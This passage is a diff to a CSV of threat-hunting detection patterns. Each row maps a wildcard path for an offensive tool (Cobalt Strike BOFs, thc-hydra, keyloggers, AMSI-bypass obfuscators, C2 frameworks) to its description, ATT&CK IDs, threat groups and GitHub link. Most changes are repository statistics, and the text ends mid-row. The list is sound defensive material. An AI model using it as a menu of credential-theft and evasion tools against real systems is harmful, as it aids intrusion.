"*/tgtParse/tgtParse.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*/thc-hydra/*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*/the-backdoor-factory.git*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*/TheFatRat*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8267","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/thc-hydra/*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*/the-backdoor-factory.git*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/TheFatRat*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" "*/theHarvester.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/theHarvester.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*/ThemeBleed.exe*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*/ThemeBleed.exe*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*/thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"*/thirdparty/msf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/thirdparty/msf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/ThisIsNotRat.git*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/thoth.git*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*/ThreadlessInject.git*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*/ThreadlessInject.git*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*/ThreatCheck.git*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*/ThunderDNS*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS 
protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*/ticketConverter.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" 
@@ -5587,22 +5648,22 @@ "*/TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/TikiSpawn/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. 
Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/timeoutpwn64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/timestomp.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/timestomping.ps1*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/timestomp.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/timestomping.ps1*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/timwr/CVE-2016-5195*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-nextprotoneg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-ticketbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tmmmp *","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*/tmp/*-passwords.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" -"*/tmp/*-usernames.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" -"*/tmp/.manspider*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*/tmmmp *","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/tmp/*-passwords.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/tmp/*-usernames.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/tmp/.manspider*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*/tmp/amass.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/bin/csprecon*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/bin/subfinder*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/c2-rebind.so*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*/tmp/chimera.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/chimera.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus 
solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/dcow *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tmp/FavFreak/*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/geckodriver.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" 
@@ -5612,55 +5673,56 @@ "*/tmp/metadata/na.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*/tmp/metasploit_install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/tmp/p0f.log*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tmp/payload.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/payload.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" 
"*/tmp/scanrepo.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/truffleHog.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*/tmp/vt-post-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/tmp/vt-results-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/tmp/wordlist.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/tmp/vt-post-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - 
T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/vt-results-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/wordlist.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*/tn3270-screen.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TokenStealing*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*/TokenStripBOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
